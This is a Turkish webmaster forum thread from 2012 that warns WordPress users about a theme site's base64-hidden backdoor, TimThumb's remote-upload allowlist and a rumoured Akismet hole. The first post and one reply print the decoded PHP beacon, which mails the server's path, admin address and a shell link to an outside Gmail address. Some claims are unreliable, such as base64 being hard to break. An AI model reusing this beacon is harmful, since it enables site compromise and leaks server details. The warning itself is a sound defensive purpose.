lostyazilim
tr.link

Wordpress Siteleriniz İçin Güncel En İyi Güvenlik Önlemleri Ve Açıklar

13 Mesajlar 4.067 Okunma
lstbozum
tr.link

Gaspard Gaspard WM Aracı Kullanıcı
  • Üyelik 16.08.2012
  • Yaş/Cinsiyet 28 / E
  • Meslek Ögrenci
  • Konum İzmir
  • Ad Soyad ** **
  • Mesajlar 46
  • Beğeniler 0 / 12
  • Ticaret 0, (%0)



Arkadaşlar yine bir makalemde birlikteyiz :), ilk önce şunu belirtmek isterim ki wordpress sistemi günümüz kodlamasında webmasterların kullanabilecegi en iyi sistemdir.Fakat her sistemde olduğu gibi güvenlik açıkları vardır (çogunu site sahipleri oluşturur). Bu yazımda, 2012 Agustos ayında hacklenmiş siteleri tek tek inceleyerek size olabilecek güvenlik açıklarını listeleyecegim ve tabi ki nasıl kapatılır nasıl bi daha olmaz vs. gibi sorularında cevaplarını verecegim. Şimdi geçelim wordpresste sorunlu ve açıkları olan temalara...



1- wptr.net tema avcısı

Bir kere wptr.net'den tema indirdiyseniz kesinlikle güvenlik açıgı olacaktır.Güvenlik açıgını da wptr.net'de ki uyanık arkadaşlar oluşturuyor. Gerçi ne yaptıklarını bilmeyen kalmadı ama olsun yine de bilgilenmeyen arkadaşlar için uyarımı yapayım. Wptr.net'den indirdiginiz temaların içinde header.php haricinde headers.php de oluyor ve bu dosyanın içindeki kodları base64 ile şifreliyorlar, haliyle kimse bişi anlamıyor, fakat base64 ile şifrelenmiş bu kodları ;



kırdıgımızda ise aynen şu kodlar çıkıyor ;

z��r�^$kime="indirelimhemen@gmail.com"; $baslik="WordPresS Tema Sw Avcisi V3.0"; $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn"; $EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn"; $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn"; $EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn"; $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn"; mail($kime, $baslik, $EL_MuHaMMeD);

Yani artık 2012' de wptr.net'in ne yaptıgını söylememize gerek yok, neyse bu konu hakkında pek üzerinde durdum geçiyorum bunu.


2- Timthumb.php

Bildigim kadarıyla timthumb eklentisi ile uzaktan erişilerek serverinize görsel yüklenebiliyor.

Bu tabi ki de normal birşey degil. Buna hangi kodlar sebeb oluyor ? ve nasıl kapatabiliriz ? işte cevap ;

timthumb.php içerisindeki bu kodlar ;

$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
);


sizin serverinize resim yükleyebilmesi için izin verdiginiz siteleri barındırıyor.


Çözüm çok basit... İzin verdiginiz siteleri oradan silin ! ve kodunuz sadece " $allowedSites = array (); " olsun :)

Ayrıca Timtumb kullanan eklentilerin listesine şurdan ulaşabilirsiniz ; http://tny.cz/a864f07b

websitedefender.com' a göre timthumb kullanan temaların listesi : http://tny.cz/82c0c3e2

Ayrıca yabancı bir websitesinde okuduguma göre timthumb bu açıgı kapatmış. Fakat ne kadar dogru bilemem.

Neyse devam edelim...

3- Akismet Açığı

Arkadaşlar kimseden saklayacak degilim samimi söylüyorum, bir warez sitesinde rastladım buna, yabancı bir temaya shell atıp temayı çekmişler, ve site adresini veremiyorum fakat "www.shellatılansite.com/plugins/akismet..." yolu üzerindeydi. Nasıl kapanır neden oldu bilmiyorum fakat dikkatli olmanızı ve eklentiyi bir süreligine durdurmanızı tavsiye ederim. Kodları incelemeye şimdiden başladım bile en kısa sürede yine bloglayanadam.blogspot.com'dan yeni makalemde bu konuya da deginip, açıgın nasıl kapatılacagını yazabilirim.


Şimdilik bu kadar arkadaşlar, yogun işlerimden blogla ilgilenme zamanı bulamıyorum fakat yine özgün makalelerimle aranızda olmaktan çok mutluyum :). Ha bide arada bloguma girmeyi eksik etmeyin hee :)

Kaynak : http://bloglayanadam.blogspot.com/2012/08/wordpress-siteleriniz-icin-guncel-en.html

soulmy lonely2134

kişi bu mesajı beğendi.

wmaraci
reklam

mrzali mrzali WM Aracı Kullanıcı
  • Üyelik 11.07.2012
  • Yaş/Cinsiyet - / E
  • Meslek serbest
  • Konum Almanya
  • Ad Soyad ** **
  • Mesajlar 78
  • Beğeniler 1 / 4
  • Ticaret 0, (%0)
tesekürler
 

 

lonely2134 lonely2134 WM Aracı Kullanıcı
  • Üyelik 31.07.2012
  • Yaş/Cinsiyet 36 / E
  • Meslek Öğrenci
  • Konum İstanbul Avrupa
  • Ad Soyad A** Ö**
  • Mesajlar 340
  • Beğeniler 51 / 62
  • Ticaret 0, (%0)
Eline sağlık güzel paylaşım olmuş...
 

 

Marka Tescil

Gaspard Gaspard WM Aracı Kullanıcı
  • Üyelik 16.08.2012
  • Yaş/Cinsiyet 28 / E
  • Meslek Ögrenci
  • Konum İzmir
  • Ad Soyad ** **
  • Mesajlar 46
  • Beğeniler 0 / 12
  • Ticaret 0, (%0)
saolasınız beyler :)
 

 

wmaraci
wmaraci

Optimus Optimus Optimus Kullanıcı
  • Üyelik 26.07.2012
  • Yaş/Cinsiyet 43 / E
  • Meslek Bilişim / İnternet
  • Konum İstanbul Anadolu
  • Ad Soyad M** D**
  • Mesajlar 380
  • Beğeniler 55 / 103
  • Ticaret 13, (%100)
Emeğine sağlık güzel bilgilendirme. base64 tam bir bela geçen hafta temama bulaşmış çok uğraşırdı beni. İndirdiğiniz eklentilere ve temalara çok dikkat edin.
 

 

McCOY35 McCOY35 WM Aracı Kullanıcı
  • Üyelik 22.08.2012
  • Yaş/Cinsiyet 39 / E
  • Meslek Satış Destek
  • Konum İzmir
  • Ad Soyad A** D**
  • Mesajlar 47
  • Beğeniler 2 / 6
  • Ticaret 3, (%100)
Sanırım benimde başıma geldi server spam gönderip duruyor bilgi için teşekkürler hemden kontrol edeyim
 

 

mccoy35.com

Gaspard Gaspard WM Aracı Kullanıcı
  • Üyelik 16.08.2012
  • Yaş/Cinsiyet 28 / E
  • Meslek Ögrenci
  • Konum İzmir
  • Ad Soyad ** **
  • Mesajlar 46
  • Beğeniler 0 / 12
  • Ticaret 0, (%0)

Optimus adlı üyeden alıntı

Emeğine sağlık güzel bilgilendirme. base64 tam bir bela geçen hafta temama bulaşmış çok uğraşırdı beni. İndirdiğiniz eklentilere ve temalara çok dikkat edin.


evet dostum aynen öyle md5 biraz kolay ama base64 zordur :(, zaten wordpresste açık yok, açıgı site sahipleri oluşturuyor bunu da başka bi yabancı siteden okudum çok haklılar :)

Ek Olarak:

McCOY35 adlı üyeden alıntı

Sanırım benimde başıma geldi server spam gönderip duruyor bilgi için teşekkürler hemden kontrol edeyim


dostum klasorlerin içine tek tek bak, "webroot" adında bişi görürsen anında sil. Şu an hack ortamındaki en güncel shelldir.
 

 

Berkay Berkay WM Aracı Kullanıcı
  • Üyelik 29.04.2011
  • Yaş/Cinsiyet 30 / E
  • Meslek Wordpress Geliştirici
  • Konum Mersin
  • Ad Soyad B** G**
  • Mesajlar 1863
  • Beğeniler 90 / 337
  • Ticaret 27, (%100)
Türk insanı blogspot kullanıp wordpress açıkları ile ilgili makale hazırlar işte :).
 

 

AydinOzturk AydinOzturk WebMaster & SEO Uzmanı Kullanıcı
  • Üyelik 15.12.2011
  • Yaş/Cinsiyet 35 / E
  • Meslek SEO Strateji Uzmanı
  • Konum İstanbul Avrupa
  • Ad Soyad A** Ö**
  • Mesajlar 679
  • Beğeniler 66 / 300
  • Ticaret 11, (%100)

Gaspard adlı üyeden alıntı


1- wptr.net tema avcısı

Bir kere wptr.net'den tema indirdiyseniz kesinlikle güvenlik açıgı olacaktır.Güvenlik açıgını da wptr.net'de ki uyanık arkadaşlar oluşturuyor. Gerçi ne yaptıklarını bilmeyen kalmadı ama olsun yine de bilgilenmeyen arkadaşlar için uyarımı yapayım. Wptr.net'den indirdiginiz temaların içinde header.php haricinde headers.php de oluyor ve bu dosyanın içindeki kodları base64 ile şifreliyorlar, haliyle kimse bişi anlamıyor, fakat base64 ile şifrelenmiş bu kodları ;



kırdıgımızda ise aynen şu kodlar çıkıyor ;

z��r�^$kime="indirelimhemen@gmail.com"; $baslik="WordPresS Tema Sw Avcisi V3.0"; $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn"; $EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn"; $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn"; $EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn"; $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn"; mail($kime, $baslik, $EL_MuHaMMeD);



Bu konuda arkadaşa hak veriyorum şimdi 4 farklı tema denedim 4 ünde de buna benzeyen farklı kod ve dışarıya bağlı, temayı kullandığınızda sitenizi mahvedebilecek onlarca yazılım ve şifreleme mevcut...
 

 

Gaspard Gaspard WM Aracı Kullanıcı
  • Üyelik 16.08.2012
  • Yaş/Cinsiyet 28 / E
  • Meslek Ögrenci
  • Konum İzmir
  • Ad Soyad ** **
  • Mesajlar 46
  • Beğeniler 0 / 12
  • Ticaret 0, (%0)

Berkay adlı üyeden alıntı

Türk insanı blogspot kullanıp wordpress açıkları ile ilgili makale hazırlar işte :).


:D normalde wpciyim fakat bu blogumu eskiden açmıştım anısı oldugu için bi türlü bırakamadım :)

Ek Olarak:

SeoMakale adlı üyeden alıntı

Bu konuda arkadaşa hak veriyorum şimdi 4 farklı tema denedim 4 ünde de buna benzeyen farklı kod ve dışarıya bağlı, temayı kullandığınızda sitenizi mahvedebilecek onlarca yazılım ve şifreleme mevcut...


aynen hocam zaten temalarınızda base64 md5 gibi şifreler gördügünüz anda, o şifreleri çözmeden veya çözdürmeden temaları kullanmayın :) gerçi türkiye de o şifreler lisans keyi olarak kullanılıyor ama özellikle yabancılar temayı şifreleyip açık bırakıyorlar tema da.